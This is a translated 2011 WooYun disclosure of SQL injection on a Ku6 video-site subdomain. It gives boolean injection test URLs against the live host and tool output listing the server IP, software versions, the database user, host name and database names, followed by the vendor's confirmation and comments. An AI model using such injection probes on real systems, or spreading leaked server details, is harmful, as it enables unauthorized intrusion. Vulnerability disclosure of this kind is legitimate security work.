
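Vulnerability summary

Vulnerability ID: wooyun-2011-02598

Title: Ku6 (酷6网) SQL injection, very high privileges

Vendor: Ku6 (酷6网)

Author: 路人甲

Submitted: 2011-07-31 11:59

Fixed: 2011-08-30 12:00

Disclosed: 2011-08-30 12:00

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]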


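Vulnerability details

Disclosure status:

2011-07-31: Details sent to the vendor; awaiting vendor handling
2011-08-01: Vendor confirmed; details disclosed to the vendor only
2011-08-11: Details disclosed to core white hats and experts in related fields
2011-08-21: Details disclosed to regular white hats
2011-08-31: Details disclosed to trainee white hats
2011-08-30: Details disclosed to the public

Brief description:

From: 淫河舰队, QQ group: 16449200

Detailed description:

http://haier-wulianwang.ku6.com/show.php?id=152 and 1=2
http://haier-wulianwang.ku6.com/show.php?id=152 and 1=3

Proof of vulnerability: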

Host IP: 59.151.119.72
Web Server: nginx/0.7.64
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current User: special_ku6_com@59.151.119.72
Sql Version: 5.1.39-log
Current DB: special_ku6_com
System User: special_ku6_com@59.151.119.72
Host Name: BJ-SYQ-36
Installation dir: /usr/local/mysql/
DB User & Pass: root::localhost
Data Bases: information_schema
a
beer
boshi
checkservice
comment_zhu
hisense
jlfhome
ku6_special
microsoft
mysql
shijiebei
special_admin_ku6_com
special_ku6_com
special_score
test
test1
yiliysr200904
yiliysr200910


Fix:

Filtering. If there are any problems, contact me at 435420828@qq.com

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


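Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2011-08-01 16:14

Vendor reply:

Many thanks to 淫河舰队 for submitting the information.

Latest status:

None yet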


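Vulnerability evaluation:

Comments

  1. 2011-07-31 17:19 | Jesus ( Trainee white hat | Rank:60 Vulnerabilities:18 | Heaven and earth are not benevolent; they treat all things as straw dogs!)

    What powerful advertising

  2. 2011-08-02 07:06 | rootsecurity ( Trainee white hat | Rank:77 Vulnerabilities:20 | Follow open source, follow network security! INSERT INTO `w...)

    helen's organization, no explanation needed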